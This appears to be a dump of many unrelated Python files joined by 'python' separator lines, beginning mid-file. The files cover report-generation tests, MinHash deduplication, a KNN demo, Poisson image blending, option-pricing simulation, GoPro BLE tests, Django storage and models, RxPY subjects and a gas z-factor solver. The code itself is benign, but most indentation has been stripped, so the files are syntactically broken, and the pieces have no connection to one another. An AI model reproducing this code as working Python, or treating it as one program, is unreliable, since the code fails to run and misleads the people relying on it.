NodeFailureTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_rolling_upgrade_report(self):
test_output_dir = os.path.join(
self.__output_dir, "ntnx", "rolling_upgrade")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "rolling_upgrade")
RollingUpgradeTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
def test_ntnx_node_failure_data_loss_report(self):
test_output_dir = os.path.join(
self.__output_dir, "ntnx", "node_failure_data_loss")
if not os.path.exists(test_output_dir):
os.makedirs(test_output_dir)
test_dir = os.path.join(self.__data_dir, "ntnx", "node_failure_data_loss")
NodeFailureDataLossTest.generate_report_testdir(test_dir, test_output_dir)
self.assertTrue(os.path.exists(
os.path.join(test_output_dir, "report.html")))
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021-07-24 11:30:23
# @Author : Chenghao Mou ([email protected])
from typing import List
from datasketch import MinHash, MinHashLSH
from nltk.util import ngrams
from text_dedup.utils.group import get_group_indices
import multiprocessing as mp
import time
class MinHashDeduper:
def __init__(self, num_perm: int = 128, threshold: float = 0.5, ngram_size: int = 5):
self.num_perm = num_perm
self.threshold = threshold
self.ngram_size = ngram_size
self.lsh = None
def fit_transform(self, data: List[str]) -> List[int]:
"""Group similar documents with minhash.
Parameters
----------
data : List[str]
List of document strings.
Returns
-------
List[int]
List of group indices.
Examples
--------
>>> deduper = MinHashDeduper(ngram_size=5, threshold=0.3)
>>> groups = deduper.fit_transform(["This is a sentence.", "This is another sentence.", "This is a question.", "hello world"])
>>> groups
[0, 0, 2, 3]
"""
self.lsh = MinHashLSH(threshold=self.threshold, num_perm=self.num_perm)
signatures = []
for i, doc in enumerate(data):
m = MinHash(num_perm=self.num_perm)
for ngram in ngrams(doc, self.ngram_size):
m.update(''.join(ngram).encode('utf-8'))
signatures.append(m)
self.lsh.insert(f'm{i}', m)
neighbors = []
for i, doc in enumerate(data):
result = self.lsh.query(signatures[i])
neighbors.append([int(x[1:]) for x in result])
return get_group_indices(neighbors)
def fit_transform_parallel(self, data: List[str]) -> List[int]:
"""Group similar documents with minhash.
Parameters
----------
data : List[str]
List of document strings.
Returns
-------
List[int]
List of group indices.
Examples
--------
>>> deduper = MinHashDeduper(ngram_size=5, threshold=0.3)
>>> groups = deduper.fit_transform(["This is a sentence.", "This is another sentence.", "This is a question.", "hello world"])
>>> groups
[0, 0, 2, 3]
"""
pool = mp.Pool(mp.cpu_count())
self.lsh = MinHashLSH(threshold=self.threshold, num_perm=self.num_perm)
signatures = [pool.apply_async(_create_signature, args=(self.num_perm, self.ngram_size, doc)) for doc in data]
for i, m in enumerate(signatures):
signatures[i] = m.get()
for i, m in enumerate(signatures):
self.lsh.insert(f'm{i}', m)
        # Parallel querying is left disabled. Note that `args=(s)` is not a tuple
        # (it would need to be `args=(s,)`), and the bound lsh.query method may not
        # pickle cleanly across worker processes; the performance impact of querying
        # serially is small either way.
        # query_results = [pool.apply_async(self.lsh.query, args=(s,)) for s in signatures]
        # for i, qr in enumerate(query_results):
        #     query_results[i] = qr.get()
neighbors = []
for i, doc in enumerate(data):
result = self.lsh.query(signatures[i])
# result = query_results[i]
neighbors.append([int(x[1:]) for x in result])
pool.close()
pool.join()
return get_group_indices(neighbors)
def _create_signature(num_perm, ngram_size, doc):
m = MinHash(num_perm=num_perm)
for ngram in ngrams(doc, ngram_size):
m.update(''.join(ngram).encode('utf-8'))
return m
|
python
|
from .binary_tree import *
|
python
|
# -*- coding: utf-8 -*-
# KNN.py
import numpy as np
import matplotlib.pyplot as plt
import cv2
if __name__ == '__main__':
    # Remember that numpy arrays support this handy boolean-mask indexing:
test = np.array([1,-2,3,-4,5])
res = test[test > 0]
# res = [1,3,5]
a = np.random.randint(0,101,(50,2),dtype=np.int64).astype(np.float32)
flag = np.random.randint(0,2,(50,1),dtype = np.int64).astype(np.float32)
red = a[flag.ravel() == 0]
blue = a[flag.ravel() == 1]
    plt.figure()
plt.scatter(red[:,0],red[:,1],40,'r')
plt.scatter(blue[:,0],blue[:,1],40,'b','<')
newcomer = np.random.randint(0,101,(1,2),dtype=np.int64).astype(np.float32)
    # draw a circle
r = 20
theta = np.arange(0, 2*np.pi, 0.01)
x = newcomer[0,0] + r * np.cos(theta)
y = newcomer[0,1] + r * np.sin(theta)
plt.plot(x, y,'r-')
plt.axis('tight')
plt.scatter(newcomer[:,0],newcomer[:,1],40,'g','>')
knn = cv2.ml.KNearest_create()
knn.train(a,cv2.ml.ROW_SAMPLE,flag)
ret,results,neighbours,dist = knn.findNearest(newcomer,5)
print('ret= ',ret)
print('results=',results)
print('neighbours=',neighbours)
print('dist=',dist)
plt.show()
|
python
|
"""
This is comment section
"""
def display_hello_world():
"""
This is a function to display "Hello World!"
:return: void
"""
print("Hello World!")
display_hello_world()
# Set text
texts = ["Hello", "World", "!"]
for text in texts:
print(text)
numberString = "917254"
for char in numberString:
number = int(char, 10)
if number > 5:
print("The number ", number, " is greater than 5.")
elif 5 == number:
print("The number is 5.")
else:
print("The number ", number, " is less than 5.")
print("End")
|
python
|
import xmltodict
import defusedxml.ElementTree as ET
class Locations:
"""Provides lookup of raw location data based on UKPRN and LOCID"""
def __init__(self, root):
"""Build the locations lookup table
Locations are unique on UKPRN and LOCID
"""
self.lookup_dict = {}
for location in root.iter("LOCATION"):
raw_location_data = xmltodict.parse(ET.tostring(location))[
"LOCATION"
]
lockey = (
f"{raw_location_data['LOCID']}{raw_location_data['UKPRN']}"
)
self.lookup_dict[lockey] = raw_location_data
def get_location_data_for_key(self, key):
return self.lookup_dict.get(key)
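# Usage sketch (hypothetical XML values, not part of the original module): keys
# are the concatenation of LOCID and UKPRN, in that order.
if __name__ == "__main__":
    demo_root = ET.fromstring(
        "<ROOT><LOCATION><LOCID>A1</LOCID><UKPRN>10000001</UKPRN></LOCATION></ROOT>"
    )
    demo_locations = Locations(demo_root)
    print(demo_locations.get_location_data_for_key("A110000001"))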
|
python
|
from django.urls import path
from apps.contents.views import IndexView
urlpatterns = [
path('index/', IndexView.as_view()),
]
|
python
|
import numpy as np
from data.external_data.maturities import convert_maturity
from data.external_data.yahoo import Yahoo
from data.local_data.parameters_generator import ParametersGenerator
from stochastic_process.markov_chain import MarkovChain, Sigma
from stochastic_process.risky_asset import RiskyAsset
class DataGenerator:
number_of_S_paths = 1000
r = 0.05
def __init__(self, asset: Yahoo, data_size, number_of_states, *args: ParametersGenerator):
self.asset = asset
self.data_size = data_size
self.number_of_states = number_of_states
self.parameters = [arg.generate(
data_size, number_of_states) for arg in args]
self.S_0 = asset.current_asset_price
def generate_y_train(self):
axis = 1 if self.data_size > 1 else 0
return np.concatenate(self.parameters, axis=axis)
@property
def number_of_calls(self):
count = 0
for maturity in self.asset.maturities:
for K in self.asset.call_options_data[maturity]['strike']:
count += 1
return count
def generate_x_real(self):
prices = []
for maturity in self.asset.maturities:
for last_price in self.asset.call_options_data[maturity]['lastPrice']:
prices.append(last_price)
return np.array(prices).reshape((self.number_of_calls,))
def generate_x_train(self):
prices = []
for sigma, transition_coefficients in zip(*self.parameters):
X = MarkovChain(*transition_coefficients)
S = RiskyAsset(self.S_0)
for maturity in self.asset.maturities:
T = convert_maturity(maturity)
length_of_S_paths = int(np.round(T, 3)*1000)
delta_t = np.linspace(0, T, length_of_S_paths)[1]
random_sample = np.random.rand(
self.number_of_S_paths, length_of_S_paths - 1)
X_paths = X.paths(random_sample, delta_t)
sigma_paths = Sigma(*sigma).paths(X_paths)
S_paths = S.paths(delta_t, sigma_paths, self.r)
S_T = S_paths[:, -1]
strikes = self.asset.call_options_data[maturity]['strike'].to_numpy(
)
for K in strikes:
prices.append(np.exp(-self.r * T) *
np.maximum(S_T - K, 0).mean())
return np.array(prices).reshape((self.data_size, self.number_of_calls))
|
python
|
# -*- coding: utf-8 -*-
import cv2
import numpy as np
from scipy.sparse.linalg import spsolve
def fix_source(source, mask, shape, offset):
mydict = {}
counter = 0
for i in range(mask.shape[0]):
for j in range(mask.shape[1]):
if mask[i][j]>127:
mydict[(i+offset[0], j+offset[1])] = counter
counter += 1
fixed_source = np.zeros(shape, dtype=int) #use int to avoid overflow
fixed_source[max(0, offset[0]):min(source.shape[0]+offset[0], shape[0]), max(0, offset[1]):min(source.shape[1]+offset[1],shape[1]),:]=source[max(0,-offset[0]):min(source.shape[0], shape[0]-offset[0]),max(0,-offset[1]):min(source.shape[1], shape[1]-offset[1]),:]
return fixed_source, mydict
offset = [[210, 10], [10, 28], [140, 80], [-40, 90], [60, 100], [-28, 88]]
for pic_index in range(1, 6):
mask = cv2.imread("../data/mask_0{0}.jpg".format(pic_index), 0)
source = cv2.imread("../data/source_0{0}.jpg".format(pic_index))
target = cv2.imread("../data/target_0{0}.jpg".format(pic_index))
fixed_source, D = fix_source(source, mask, target.shape, offset[pic_index-1]) #fixed source, same size with target
A = np.zeros((len(D),len(D)), dtype=int)
b = np.zeros((len(D),3), dtype=int)
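    # Note (not in the original): A is assembled as a dense array here; spsolve will
    # typically warn and convert it to CSC format internally. For larger masks,
    # building A as a scipy.sparse.lil_matrix and calling A.tocsc() before solving
    # would avoid the dense allocation.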
for k, v in D.items():
A[v][v] = 4
b[v] += 4*fixed_source[k[0]][k[1]] \
- fixed_source[k[0]+1][k[1]] \
- fixed_source[k[0]-1][k[1]] \
- fixed_source[k[0]][k[1]+1] \
- fixed_source[k[0]][k[1]-1]
if (k[0]+1, k[1]) in D: # in D means this pixel is waiting to be calculated
A[v][D[(k[0]+1, k[1])]] = -1
else:
b[v] += target[k[0]+1][k[1]]
if (k[0]-1, k[1]) in D:
A[v][D[(k[0]-1, k[1])]] = -1
else:
b[v] += target[k[0]-1][k[1]]
if (k[0], k[1]+1) in D:
A[v][D[(k[0], k[1]+1)]] = -1
else:
b[v] += target[k[0]][k[1]+1]
if (k[0], k[1]-1) in D:
A[v][D[(k[0], k[1]-1)]] = -1
else:
b[v] += target[k[0]][k[1]-1]
x = spsolve(A, b)
for k, v in D.items():
if x[v][0]>255:
target[k[0]][k[1]][0] = np.uint8(255)
elif x[v][0]<0:
target[k[0]][k[1]][0] = np.uint8(0)
else:
target[k[0]][k[1]][0] = np.uint8(round(x[v][0]))
if x[v][1]>255:
target[k[0]][k[1]][1] = np.uint8(255)
elif x[v][1]<0:
target[k[0]][k[1]][1] = np.uint8(0)
else:
target[k[0]][k[1]][1] = np.uint8(round(x[v][1]))
if x[v][2]>255:
target[k[0]][k[1]][2] = np.uint8(255)
elif x[v][2]<0:
target[k[0]][k[1]][2] = np.uint8(0)
else:
target[k[0]][k[1]][2] = np.uint8(round(x[v][2]))
# target[k[0]][k[1]][0] = np.uint8(round(x[v][0])%256)
# target[k[0]][k[1]][1] = np.uint8(round(x[v][1])%256)
# target[k[0]][k[1]][2] = np.uint8(round(x[v][2])%256)
cv2.imwrite("result_0{0}.jpg".format(pic_index), target)
|
python
|
from typing import List, Optional, Tuple, Dict, Callable
import torch
from torch import Tensor
from tha2.poser.poser import PoseParameterGroup, Poser
from tha2.nn.batch_module.batch_input_module import BatchInputModule
from tha2.compute.cached_computation_func import TensorListCachedComputationFunc
class GeneralPoser02(Poser):
def __init__(self,
module_loaders: Dict[str, Callable[[], BatchInputModule]],
device: torch.device,
output_length: int,
pose_parameters: List[PoseParameterGroup],
output_list_func: TensorListCachedComputationFunc,
subrect: Optional[Tuple[Tuple[int, int], Tuple[int, int]]] = None,
default_output_index: int = 0):
self.default_output_index = default_output_index
self.output_list_func = output_list_func
self.subrect = subrect
self.pose_parameters = pose_parameters
self.device = device
self.module_loaders = module_loaders
self.modules = None
self.num_parameters = 0
for pose_parameter in self.pose_parameters:
self.num_parameters += pose_parameter.get_arity()
self.output_length = output_length
def get_modules(self):
if self.modules is None:
self.modules = {}
for key in self.module_loaders:
module = self.module_loaders[key]()
self.modules[key] = module
module.to(self.device)
module.train(False)
return self.modules
def get_pose_parameter_groups(self) -> List[PoseParameterGroup]:
return self.pose_parameters
def get_num_parameters(self) -> int:
return self.num_parameters
def pose(self, image: Tensor, pose: Tensor, output_index: Optional[int] = None) -> Tensor:
if output_index is None:
output_index = self.default_output_index
output_list = self.get_posing_outputs(image, pose)
return output_list[output_index]
def get_posing_outputs(self, image: Tensor, pose: Tensor) -> List[Tensor]:
modules = self.get_modules()
if len(image.shape) == 3:
image = image.unsqueeze(0)
if len(pose.shape) == 1:
pose = pose.unsqueeze(0)
if self.subrect is not None:
image = image[:, :, self.subrect[0][0]:self.subrect[0][1], self.subrect[1][0]:self.subrect[1][1]]
batch = [image, pose]
outputs = {}
return self.output_list_func(modules, batch, outputs)
def get_output_length(self) -> int:
return self.output_length
|
python
|
# test_ble_commands.py/Open GoPro, Version 1.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue May 18 22:08:51 UTC 2021
import pytest
from construct import Int32ub
from open_gopro.ble_commands import BLECommunicator, BleCommands, BleSettings, BleStatuses
from open_gopro.constants import SettingId, StatusId, UUID, CmdId, QueryCmdId, ProducerType
from open_gopro import params, proto
@pytest.fixture
def ble():
class Communicator(BLECommunicator):
def __init__(self):
self.commands = BleCommands(self)
self.statuses = BleStatuses(self)
self.settings = BleSettings(self)
def read(self, uuid: UUID):
return uuid
def write(self, uuid: UUID, data: bytearray):
return uuid, data
def register_listener(self, producer: ProducerType) -> bool:
return True
def unregister_listener(self, producer: ProducerType) -> bool:
return True
def get_update(self) -> bool:
return True
yield Communicator()
def test_write_command_correct_uuid_cmd_id(ble):
uuid, data = ble.commands.set_shutter(params.Shutter.ON)
assert uuid is UUID.CQ_COMMAND
assert data[1] == CmdId.SET_SHUTTER.value
def test_write_command_correct_parameter_data(ble):
uuid, data = ble.commands.load_preset(params.Preset.TIME_LAPSE)
assert uuid is UUID.CQ_COMMAND
assert Int32ub.parse(data[-4:]) == params.Preset.TIME_LAPSE.value
def test_read_command_correct_uuid(ble):
uuid = ble.commands.get_wifi_ssid()
assert uuid is UUID.WAP_SSID
def test_setting_set(ble):
uuid, data = ble.settings.resolution.set(params.Resolution.RES_1080)
assert uuid is UUID.CQ_SETTINGS
assert data[1] == SettingId.RESOLUTION.value
assert data[3] == params.Resolution.RES_1080.value
def test_setting_get_value(ble):
uuid, data = ble.settings.resolution.get_value()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.GET_SETTING_VAL.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_get_capabilities_values(ble):
uuid, data = ble.settings.resolution.get_capabilities_values()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.GET_CAPABILITIES_VAL.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_register_value_update(ble):
uuid, data = ble.settings.resolution.register_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.REG_SETTING_VAL_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_unregister_value_update(ble):
uuid, data = ble.settings.resolution.unregister_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.UNREG_SETTING_VAL_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_register_capability_update(ble):
uuid, data = ble.settings.resolution.register_capability_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.REG_CAPABILITIES_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_unregister_capability_update(ble):
uuid, data = ble.settings.resolution.unregister_capability_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.UNREG_CAPABILITIES_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_status_get_value(ble):
uuid, data = ble.statuses.encoding_active.get_value()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.GET_STATUS_VAL.value
assert data[2] == StatusId.ENCODING.value
def test_status_register_value_update(ble):
assert ble.register_listener(None)
uuid, data = ble.statuses.encoding_active.register_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.REG_STATUS_VAL_UPDATE.value
assert data[2] == StatusId.ENCODING.value
def test_status_unregister_value_update(ble):
assert ble.unregister_listener(None)
uuid, data = ble.statuses.encoding_active.unregister_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.UNREG_STATUS_VAL_UPDATE.value
assert data[2] == StatusId.ENCODING.value
def test_proto_command_arg(ble):
uuid, data = ble.commands.set_turbo_mode(True)
assert uuid is UUID.CQ_COMMAND
assert data == bytearray(b"\x04\xf1k\x08\x01")
out = proto.ResponseGeneric.FromString(data[3:])
print(out)
d = out.to_dict()
def test_proto_command_kwargs(ble):
uuid, data = ble.commands.get_preset_status(
register_preset_status=[
params.EnumRegisterPresetStatus.REGISTER_PRESET_STATUS_PRESET,
params.EnumRegisterPresetStatus.REGISTER_PRESET_STATUS_PRESET_GROUP_ARRAY,
],
unregister_preset_status=[params.EnumRegisterPresetStatus.REGISTER_PRESET_STATUS_PRESET],
)
assert uuid is UUID.CQ_COMMAND
assert data == b"\t\xf5\x02\n\x02\x01\x02\x12\x01\x01"
|
python
|
from django.conf import settings
# - {% if cookiecutter.django_media_engine == S3 %}
from storages.backends.s3boto3 import S3Boto3Storage
class PrivateMediaStorage(S3Boto3Storage):
"""Media storage which disables public access by default
When you use this as the default storage it makes sense to
turn off all public access to the bucket.
# - {%- if cookiecutter.thorgate == YES %}
You can do this by changing the `s3_media_bucket_is_public` variable
in Terraform to false in the file {{cookiecutter.repo_name}}/utils/terraform/variables.tf
# - {%- endif %}
"""
location = settings.MEDIAFILES_LOCATION
default_acl = "private"
class MediaStorage(S3Boto3Storage):
location = settings.MEDIAFILES_LOCATION
default_acl = "public-read"
# - {%- endif %}{% if cookiecutter.django_media_engine == GCS %}
from storages.backends.gcloud import GoogleCloudStorage
class PrivateMediaStorage(GoogleCloudStorage):
location = settings.MEDIAFILES_LOCATION
default_acl = "private"
class MediaStorage(GoogleCloudStorage):
location = settings.MEDIAFILES_LOCATION
default_acl = "publicRead"
# - {% endif %}
|
python
|
"""
Implementation of POSFrequencyPipeline for score ten only.
"""
import json
import re
from constants import ASSETS_PATH
from core_utils.article import ArtifactType
from core_utils.visualizer import visualize
from pipeline import CorpusManager, validate_dataset
class EmptyFileError(Exception):
"""
Custom error
"""
class IncorrectFormatError(Exception):
"""
Custom error
"""
class POSFrequencyPipeline:
def __init__(self, corpus_manager: CorpusManager):
self.corpus_manager = corpus_manager
def run(self):
"""
Running the pipeline scenario
"""
for article in self.corpus_manager.get_articles().values():
# get the file to take the pos tags from
with open(article.get_file_path(ArtifactType.single_tagged), encoding="utf-8") as st_file:
morph_text = st_file.read()
validate_input(morph_text)
freqs = self._generate_freqs_pos(morph_text)
# TASK
freqs_cases = self._generate_freqs_n_cases(morph_text)
# save calculated freqs to meta file
with open(ASSETS_PATH / article.get_meta_file_path(), encoding="utf-8") as m_file:
meta_info = json.load(m_file)
meta_info.update({"pos_frequencies": freqs})
with open(ASSETS_PATH / article.get_meta_file_path(), "w", encoding="utf-8") as m_file:
json.dump(meta_info, m_file, indent=4, ensure_ascii=False, separators=(',', ':'))
# visualise results
visualize(statistics=freqs, path_to_save=ASSETS_PATH / f"{article.article_id}_image.png")
visualize(statistics=freqs_cases, path_to_save=ASSETS_PATH / f"{article.article_id}_case_image.png")
def _generate_freqs_pos(self, text):
freqs_dict = {}
pos_pattern = re.findall(r"<([A-Z]+)", text)
for pos in pos_pattern:
freqs_dict[pos] = freqs_dict.get(pos, 0) + 1
return freqs_dict
def _generate_freqs_n_cases(self, text):
freqs_dict = {}
nouns = re.findall(r"<S.*>", text)
cases_search = re.compile(r"([а-я]+),(?=мн|ед)")
cases_names = ["им", "род", "дат", "вин", "твор", "пр", "парт", "местн", "зват"]
for noun in nouns:
cases = re.findall(cases_search, noun)
for case in cases:
if case in cases_names:
freqs_dict[case] = freqs_dict.get(case, 0) + 1
return freqs_dict
def validate_input(to_validate):
if not to_validate:
raise EmptyFileError("There is nothing in the file.")
if not isinstance(to_validate, str):
raise IncorrectFormatError("The file should be read into string.")
def main():
validate_dataset(ASSETS_PATH)
corpus_manager = CorpusManager(ASSETS_PATH)
pipeline = POSFrequencyPipeline(corpus_manager=corpus_manager)
pipeline.run()
if __name__ == "__main__":
main()
|
python
|
#!/usr/bin/env python
"""Helper functions to store and get the selected backend"""
from collections import namedtuple
import logging
from dosna.util import named_module
log = logging.getLogger(__name__)
_current = None
AVAILABLE = ['ram', 'hdf5', 'ceph', 'sage', 's3']
# Currently there is no need for more fancy attributes
Backend = namedtuple('Backend', ['name', 'Connection', 'Dataset', 'DataChunk'])
def use_backend(backend):
backend = backend.lower()
global _current
if backend in AVAILABLE:
module_ = named_module('dosna.backends.{}'.format(backend))
if hasattr(module_, '_backend'):
log.debug('Switching backend to `%s`', module_._backend.name)
_current = module_._backend
else:
raise Exception(
'Module `{}` is not a proper backend.'.format(backend))
else:
raise Exception('Backend `{}` not available! Choose from: {}'
.format(backend, AVAILABLE))
def get_backend(name=None):
if name is not None:
use_backend(name)
if _current is None:
use_backend(AVAILABLE[0])
return _current
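# Usage sketch (assuming this module is importable as dosna.backends and that the
# in-memory 'ram' backend ships with the package):
#
#     from dosna import backends
#     backends.use_backend('ram')
#     print(backends.get_backend().name)  # 'ram'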
|
python
|
from helpers.runner import run_main
from helpers.cli import cmdout
def test_no_cmd(cmdout):
try:
run_main([])
except SystemExit:
pass
cmdout.assert_substrs_in_line(0, ["usage:"], on_stderr=True)
|
python
|
from ZstudentDAO import studentDAO
# We pass in the data we receive from the JSON payload
#create
latestid = studentDAO.create(('Eilish', 22))
#find by id
result = studentDAO.findByID(latestid)  # needs to be converted into a JSON object
print (result)
#update
studentDAO.update(('Liam',23,latestid))
result = studentDAO.findByID(latestid)
print (result)
#getall
allStudents = studentDAO.getAll()
for student in allStudents:
print(student)
#delete
studentDAO.delete(latestid)
|
python
|
"""
Script to solve z-factor and gas density at the same time
Using Dranchuk and Aboukassem (1975)
"""
def dranchuk(T_pr, P_pr):
# T_pr : calculated pseudoreduced temperature
# P_pr : calculated pseudoreduced pressure
from scipy.optimize import fsolve # non-linear solver
import numpy as np
a1 = 0.3265; a2 = -1.0700; a3 = -0.5339; a4 = 0.01569; a5 = -0.05165; a6 = 0.5475
a7 = -0.7361; a8 = 0.1844; a9 = 0.1056; a10 = 0.6134; a11 = 0.7210
def f(y):
rho_pr, z = y
c1 = a1 + (a2/T_pr) + (a3/(T_pr**3))+ (a4/(T_pr**4))+ (a5/(T_pr**5))
c2 = a6 + (a7/T_pr) + (a8/(T_pr**2))
c3 = a9*((a7/T_pr) + (a8/(T_pr**2)))
c4 = (a10)*(1+(a11*(rho_pr**2)))*((rho_pr**2)/(T_pr**3))*(np.exp(-a11*(rho_pr**2)))
f1 = z + (c3*(rho_pr**5)) - (c2*(rho_pr**2)) - (c1*(rho_pr**1)) - c4 - 1
f2 = rho_pr - ((0.27 * P_pr) / (z * T_pr))
return[f1, f2]
solve = fsolve(f, [1, 1]) # initial guess
return(solve[0], solve[1]) # result is density, z-factor
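# Usage sketch (illustrative pseudo-reduced values, not taken from the original script):
if __name__ == "__main__":
    rho_pr, z = dranchuk(T_pr=1.5, P_pr=2.0)
    print("pseudo-reduced density:", rho_pr, "z-factor:", z)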
|
python
|
# Generated by Django 3.0.2 on 2020-03-06 22:30
from django.db import migrations
import streamfield.fields
class Migration(migrations.Migration):
dependencies = [
('pagine', '0014_event_carousel'),
]
operations = [
migrations.AddField(
model_name='blog',
name='carousel',
field=streamfield.fields.StreamField(blank=True, default='[]', help_text='Una sola galleria, per favore, larghezza minima immagini 2048px', null=True, verbose_name='Galleria'),
),
migrations.AlterField(
model_name='event',
name='carousel',
field=streamfield.fields.StreamField(blank=True, default='[]', help_text='Una sola galleria, per favore, larghezza minima immagini 2048px', null=True, verbose_name='Galleria'),
),
]
|
python
|
from typing import Any, Optional
from rx.disposable import Disposable
from rx.core import typing
from .subject import Subject
from .innersubscription import InnerSubscription
class AsyncSubject(Subject):
"""Represents the result of an asynchronous operation. The last value
before the close notification, or the error received through
on_error, is sent to all subscribed observers."""
def __init__(self) -> None:
"""Creates a subject that can only receive one value and that value is
cached for all future observations."""
super().__init__()
self.value = None
self.has_value = False
def _subscribe_core(self,
observer: typing.Observer,
scheduler: Optional[typing.Scheduler] = None
) -> typing.Disposable:
with self.lock:
self.check_disposed()
if not self.is_stopped:
self.observers.append(observer)
return InnerSubscription(self, observer)
ex = self.exception
has_value = self.has_value
value = self.value
if ex:
observer.on_error(ex)
elif has_value:
observer.on_next(value)
observer.on_completed()
else:
observer.on_completed()
return Disposable()
def _on_next_core(self, value: Any) -> None:
"""Remember the value. Upon completion, the most recently received value
will be passed on to all subscribed observers.
Args:
value: The value to remember until completion
"""
with self.lock:
self.value = value
self.has_value = True
def _on_completed_core(self) -> None:
"""Notifies all subscribed observers of the end of the sequence. The
most recently received value, if any, will now be passed on to all
subscribed observers."""
with self.lock:
observers = self.observers.copy()
self.observers.clear()
value = self.value
has_value = self.has_value
if has_value:
for observer in observers:
observer.on_next(value)
observer.on_completed()
else:
for observer in observers:
observer.on_completed()
def dispose(self) -> None:
"""Unsubscribe all observers and release resources."""
with self.lock:
self.value = None
super().dispose()
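# Usage sketch (not part of the RxPY source): an AsyncSubject emits only the
# last value received before on_completed, and only once completion occurs.
#
#     subject = AsyncSubject()
#     subject.subscribe(on_next=print)
#     subject.on_next(1)
#     subject.on_next(2)
#     subject.on_completed()  # prints 2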
|
python
|
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.utils.timezone import now
class BaseModel(models.Model):
created = models.DateTimeField(auto_now_add=True, verbose_name=_("Created, UTC"))
updated = models.DateTimeField(auto_now=True, verbose_name=_("Updated, UTC"))
@property
def human_date(self):
delta = now() - self.created
if delta.total_seconds() < 60 * 60:
return "just now"
elif delta.total_seconds() < 60 * 60 * 5:
return "%sh ago" % str(int(delta.total_seconds() / (60 * 60)))
elif delta.total_seconds() < 60 * 60 * 24:
return "today"
elif delta.total_seconds() < 60 * 60 * 24 * 7:
return "%sd ago" % str(int(delta.total_seconds() / (60 * 60 * 24)))
else:
return self.created.strftime("%d %b %Y")
class Meta:
abstract = True
class Email(BaseModel, models.Model):
name = models.CharField(max_length=255, blank=True, null=True)
email = models.EmailField()
subject = models.CharField(max_length=255)
message = models.TextField()
meta = models.TextField(blank=True, null=True)
is_sent = models.BooleanField(blank=True, default=False)
|
python
|
# Testing various potentials.
from asap3 import *
from asap3.md.verlet import VelocityVerlet
from asap3.EMT2013Parameters import PtY_parameters
from ase.lattice.cubic import *
from ase.lattice.compounds import *
from numpy import *
from asap3.testtools import ReportTest
try:
import potResults
except ImportError:
resultfail = True
else:
resultfail = False
import os
import sys  # needed for sys.argv and sys.exit below
timeunit = 1.018047e-14 # Seconds
femtosecond = 1e-15 / timeunit # Femtosecond in atomic units
print_version(1)
def dotest(atoms, nsteps, ampl, name):
print "Potential energy", atoms.get_potential_energy() / len(atoms)
r = atoms.get_positions()
r.flat[:] += ampl * sin(arange(3*len(atoms)))
atoms.set_positions(r)
print "Potential energy", atoms.get_potential_energy() / len(atoms)
print "Running Verlet dynamics (%s)" % (name,)
dyn = VelocityVerlet(atoms, 2*femtosecond)
etot1 = (atoms.get_potential_energy() + atoms.get_kinetic_energy())
dyn.run(nsteps)
etot2 = (atoms.get_potential_energy() + atoms.get_kinetic_energy())
ReportTest(("Energy conservation (%s)" % (name,)), etot1, etot2, 1.0)
print etot1, etot2
epot = atoms.get_potential_energies()
stress = atoms.get_stresses()
if firsttime:
print "Reporting energies and stresses"
e = []
s = []
j = 0
for i in range(0, len(atoms), 100):
e.append(epot[i])
s.append(stress[i,j])
j = (j + 1) % 6
print >> out, "e"+name+" =", repr(e)
print >> out, "s"+name+" =", repr(s)
else:
print "Testing energies and stresses"
j = 0
eres=getattr(potResults, "e"+name)
sres=getattr(potResults, "s"+name)
for i in range(len(atoms)/100):
ReportTest(("%s energy %d" % (name, i*100)),
epot[i*100], eres[i], 1e-8, silent=True)
ReportTest(("%s stress %d" % (name, i*100)),
stress[i*100, j], sres[i], 1e-8, silent=True)
j = (j + 1) % 6
firsttime = (len(sys.argv) >= 2 and sys.argv[1] == '--first')
if firsttime and os.path.exists("potResults.py"):
print "This will overwrite the result file 'potResults.py'."
print "If you really want to do this, erase it and run this again."
sys.exit(1)
if resultfail and not firsttime:
print "Importing 'potResults.py' failed!"
print "Maybe you need to create it with the --first option."
sys.exit(1)
if firsttime:
print "Creating the file 'potResults.py'"
out = open('potResults.py', "w")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Cu", pbc=(1,0,1), debug=0)
ReportTest("Number of Cu atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT())
dotest(atoms, 50, 0.1, "EMT_Cu")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Cu", pbc=(1,0,1), debug=0)
ReportTest("Number of Cu atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT(EMTRasmussenParameters()))
dotest(atoms, 50, 0.1, "EMT_Cu_Rasm")
#atoms = BodyCenteredCubic([[1,0,0],[0,1,0],[0,0,1]], size=(15,15,30),
# element="Mo", periodic=(1,0,1), debug=0)
#ReportTest("Number of Mo atoms", len(atoms), 13500, 0)
#
#atoms.SetCalculator(MoPotential())
#dotest(atoms, 50, 0.06, "Mo")
